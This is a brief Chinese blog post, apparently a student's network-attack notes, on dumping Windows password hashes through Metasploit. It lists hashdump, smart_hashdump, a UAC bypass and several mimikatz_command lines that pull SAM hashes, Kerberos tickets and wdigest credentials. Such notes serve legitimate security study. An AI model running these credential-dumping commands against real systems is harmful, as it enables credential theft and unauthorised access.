msf之hash攻击

 使用hashdump抓取密码(需要系统管理权限)

 msf之hash攻击

另外一个更强大的模块 smart_hashdump

msf之hash攻击

 

如果目标是win7 就需要先绕过UAC 

 

还可以使用msf内置的mimikatz抓取hash

msf之hash攻击

msv

msf之hash攻击

 

kerberos 抓取系统票据

 

 msf之hash攻击

wdigest 获取系统账户信息

msf之hash攻击

 

mimikatz_command -f samdump::hashed 抓取hash

mimikatz_command -f handle::list 查看进程

mimikatz_command -f service::list windows 服务

mimikatz_command -f crypto::listProviders 查看系统证书 支持PowerShell调用(Invoke-Mimikatz)

 

上一篇:2018-2019 2 20165203 《网络对抗技术》Exp6 信息搜集与漏洞扫描


下一篇:软件工程之构造之法的学习